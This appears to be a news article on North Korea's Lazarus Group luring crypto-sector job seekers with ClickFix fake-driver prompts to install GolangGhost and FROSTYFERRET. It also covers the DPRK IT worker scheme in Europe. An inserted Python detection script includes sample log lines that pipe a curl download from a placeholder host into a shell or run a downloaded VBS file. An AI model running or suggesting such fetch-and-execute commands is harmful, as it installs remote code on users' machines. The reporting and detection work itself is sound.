
Lazarus Group Now Targets Job Seekers With ClickFix Tactic to Deploy GolangGhost Malware!

The N. Korean threat actors behind Contagious Interview have adopted the increasingly popular ClickFix social engineering tactic to lure job seekers in the cryptocurrency sector & deliver a previously undocumented Go-based backdoor called GolangGhost to Windows & macOS systems.

The recent activity, assessed to be a continuation of the campaign, has been codenamed ClickFake Interview by French cybersecurity company Sekoia. Contagious Interview, also tracked as DeceptiveDevelopment, DEV#POPPER, & Famous Chollima, is known to be active since at least Dec. 2022, although it was only publicly documented for the 1st time in late 2023.

Job Interview

“It uses legitimate job interview websites to use the ClickFix tactic & install Windows & macOS backdoors,” Sekoia researchers Amaury G., Coline Chavane, & Felix Aimé said, attributing the effort to the infamous Lazarus Group, a prolific adversary attributed to the Reconnaissance General Bureau (RGB) of the Democratic People’s Republic of Korea (DPRK).

A major aspect of the campaign is that it primarily targets centralised finance entities by impersonating companies like Coinbase, KuCoin, Kraken, Circle, Securitize, BlockFi, Tether, Robinhood, & Bybit, marking a departure from the hacking group’s attacks against decentralised finance (DeFi) entities.

Fake Job Offers 

Contagious Interview, like Operation Dream Job, employs fake job offers as lures to attract prospective targets & dupe them into downloading malware that can steal cryptocurrency & other sensitive data.

As part of the effort, candidates are approached via LinkedIn or X to prepare for a video call interview, for which they are asked to download a malware-laced videoconferencing software or open-source project that activates the infection process.

Attack Chains

Lazarus Group’s use of the ClickFix tactic was 1st disclosed towards the end of 2024 by security researcher Taylor Monahan, with the attack chains leading to the deployment of a family of malware called FERRET that then delivers the Golang backdoor.

In this version of the campaign, victims are asked to visit a purported video interviewing service named Willo & complete a video assessment of themselves.

“The entire setup, meticulously designed to build user trust, proceeds smoothly until the user is asked to enable their camera,” Sekoia explained. “At this point, an error message appears indicating that the user needs to download a driver to fix the issue. This is where the operator employs the ClickFix technique.”

Camera or Microphone

The instructions given to the victim to enable access to the camera or microphone vary depending on the operating system in use. On Windows, targets are prompted to open Command Prompt & run a curl command that fetches & executes a Visual Basic Script (VBS) file, which then launches a batch script to run GolangGhost.

If the victim is visiting the site from a macOS machine, they are similarly asked to launch the Terminal app & run a curl command that executes a shell script. That shell script, in turn, runs a 2nd shell script which executes a stealer module dubbed FROSTYFERRET (aka ChromeUpdateAlert) & the backdoor.
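The two operating-system branches above share one shape a defender can hunt for: a command typed into an interactive console that both downloads with curl and hands the result to a script interpreter (a .vbs file on Windows, a shell on macOS). The following is an added example, not code from Sekoia or the article, that applies that heuristic to a few constructed process-creation log lines. The log format (timestamp|os|parent|image|cmdline), the field names, the placeholder URLs and the file names are all assumptions made for the example; none are indicators from the campaign.

```python
"""
Heuristic detection of ClickFix-style "paste this into a console" chains:
on Windows a curl download followed by execution of a .vbs file, on macOS a
curl download whose output is handed to a shell. Added example; the log
lines below are constructed and contain no real indicators.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    timestamp: str
    host_os: str   # "windows" or "macos" (assumed field)
    parent: str    # image name of the parent process (assumed field)
    image: str     # image name of the created process (assumed field)
    cmdline: str   # full command line (assumed field)


# ClickFix depends on a human pasting a command, so the chain starts from an
# interactive console rather than a service or scheduled task.
INTERACTIVE_SHELLS = {"cmd.exe", "powershell.exe", "terminal", "iterm2", "zsh", "bash", "sh"}

CURL_RE = re.compile(r"\bcurl(\.exe)?\b", re.IGNORECASE)
# Windows branch: a .vbs file, or cscript/wscript, in the same command line as curl.
WINDOWS_VBS_RE = re.compile(r"\.vbs\b|\b(c|w)script(\.exe)?\b", re.IGNORECASE)
# macOS branch: curl output piped into a shell, or a downloaded .sh run by a shell.
MACOS_SHELL_RE = re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b|\b(ba|z)?sh\s+(-c\s+)?\S+\.sh\b", re.IGNORECASE)


def parse_log(lines: List[str]) -> List[ProcessEvent]:
    """Parse 'timestamp|os|parent|image|cmdline' lines; the command line may itself contain '|'."""
    events = []
    for line in lines:
        parts = line.split("|", 4)
        if len(parts) != 5:
            continue  # malformed line: skip rather than crash the hunt
        ts, host_os, parent, image, cmdline = (p.strip() for p in parts)
        events.append(ProcessEvent(ts, host_os.lower(), parent, image, cmdline))
    return events


def classify(ev: ProcessEvent) -> Optional[str]:
    """Return a rule name when the event matches a ClickFix chain, else None."""
    if ev.parent.lower() not in INTERACTIVE_SHELLS:
        return None
    if not CURL_RE.search(ev.cmdline):
        return None
    if ev.host_os == "windows" and WINDOWS_VBS_RE.search(ev.cmdline):
        return "clickfix_windows_curl_to_vbs"
    if ev.host_os == "macos" and MACOS_SHELL_RE.search(ev.cmdline):
        return "clickfix_macos_curl_to_sh"
    return None


def detect(lines: List[str]) -> List[Tuple[str, str]]:
    """Run the heuristic over raw log lines and return (timestamp, rule) for each hit."""
    hits = []
    for ev in parse_log(lines):
        rule = classify(ev)
        if rule:
            hits.append((ev.timestamp, rule))
    return hits


# Constructed sample log: two ClickFix-shaped commands and three benign lines.
SAMPLE_LOG = [
    "2025-03-31T10:12:03Z|windows|cmd.exe|curl.exe|curl -o %TEMP%\\driver_fix.vbs http://placeholder.invalid/fix.vbs && cscript //nologo %TEMP%\\driver_fix.vbs",
    "2025-03-31T10:14:10Z|windows|cmd.exe|curl.exe|curl -o report.csv https://intranet.example/export",
    "2025-03-31T10:15:47Z|macos|Terminal|curl|curl -fsSL http://placeholder.invalid/fix.sh | sh",
    "2025-03-31T10:16:02Z|macos|zsh|curl|curl -O https://downloads.example/file.tar.gz",
    "2025-03-31T10:20:30Z|windows|services.exe|curl.exe|curl -o C:\\scripts\\job.vbs https://intranet.example/job.vbs && cscript C:\\scripts\\job.vbs",
]

if __name__ == "__main__":
    for ts, rule in detect(SAMPLE_LOG):
        print(f"{ts}  {rule}")
```

The last sample line is deliberately a curl-plus-VBS command with a non-interactive parent: the rule stays quiet there, because the point of the ClickFix pattern is that a person typed it. In a real environment the parent filter and the URL allow-list are the two knobs to tune; the regexes only encode the chain shape the campaign description gives.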

Fake Window

FROSTYFERRET displays a fake window stating the Chrome web browser needs access to the user’s camera or microphone, after which it displays a prompt to enter the system password.

The entered password, whether valid or not, is exfiltrated to a Dropbox location, likely indicating an attempt to access the iCloud Keychain using the stolen credential.

GolangGhost is engineered to facilitate remote control & data theft through several commands that allow it to upload/download files, send host information, & steal web browser data.

Manager Jobs

“It was found that all the positions were not related to technical profiles in software development,” Sekoia noted. “They are mainly jobs of manager focusing on business development, asset management, product development or decentralised finance specialists.”

“This is a significant change from previous documented campaigns attributed to DPRK-nexus threat actors and based on fake job interviews, which mainly targeted developers & software engineers.”

Korea IT Worker Scheme Active in Europe

The development comes as the Google Threat Intelligence Group (GTIG) stated it has observed a surge in the fraudulent IT worker scheme in Europe, underscoring a significant expansion of their operations beyond the US.

The IT worker activity entails N. Korean nationals posing as legitimate remote workers to infiltrate companies and generate illicit revenue for Pyongyang in violation of international sanctions.

Increased awareness of the activity, coupled with the US Justice Department indictments, has instigated a “global expansion of IT worker operations,” Google said, noting it uncovered several fabricated personas seeking employment in various organisations located in Germany & Portugal.

Falsifying their Identities

The IT workers have also been observed undertaking various projects in the United Kingdom related to web development, bot development, content management system (CMS) development, & blockchain technology, often falsifying their identities & claiming to be from Italy, Japan, Malaysia, Singapore, Ukraine, the US, & Vietnam.

This tactic of IT workers posing as Vietnamese, Japanese, & Singaporean nationals was also highlighted by managed intelligence firm Nisos early last month, while also pointing out their use of GitHub to carve new personas or recycle portfolio content from older personas to reinforce their new ones.

Various Online Platforms

“IT workers in Europe were recruited through various online platforms, including Upwork, Telegram, & Freelancer,” Jamie Collier, Lead Threat Intelligence Advisor for Europe at GTIG, said. “Payment for their services was facilitated through cryptocurrency, the TransferWise service, & Payoneer, highlighting the use of methods that obfuscate the origin & destination of funds.”

Besides using local facilitators to help them land jobs, the insider threat operation has seen what appears to be a spike in extortion attempts since Oct. 2024, when it became public knowledge that these IT workers were demanding ransom payments from their employers in exchange for not releasing proprietary data or handing it to a competitor.

Bring Your Own Device

In what appears to be a further evolution of the scheme, the IT workers are now said to be targeting companies that operate a Bring Your Own Device (BYOD) policy, because such devices are unlikely to carry the traditional security & logging tools used in enterprise environments.

“Europe needs to wake up fast. Despite being in the crosshairs of IT worker operations, too many perceive this as a US problem. N. Korea’s recent shifts likely stem from US operational hurdles, showing IT workers’ agility & ability to adapt to changing circumstances,” Collier explained.

Relentless Innovation

“A decade of diverse cyberattacks precedes N. Korea’s latest surge – from SWIFT targeting & ransomware, to cryptocurrency theft & supply chain compromise. This relentless innovation demonstrates a longstanding commitment to fund the regime through cyber operations.”
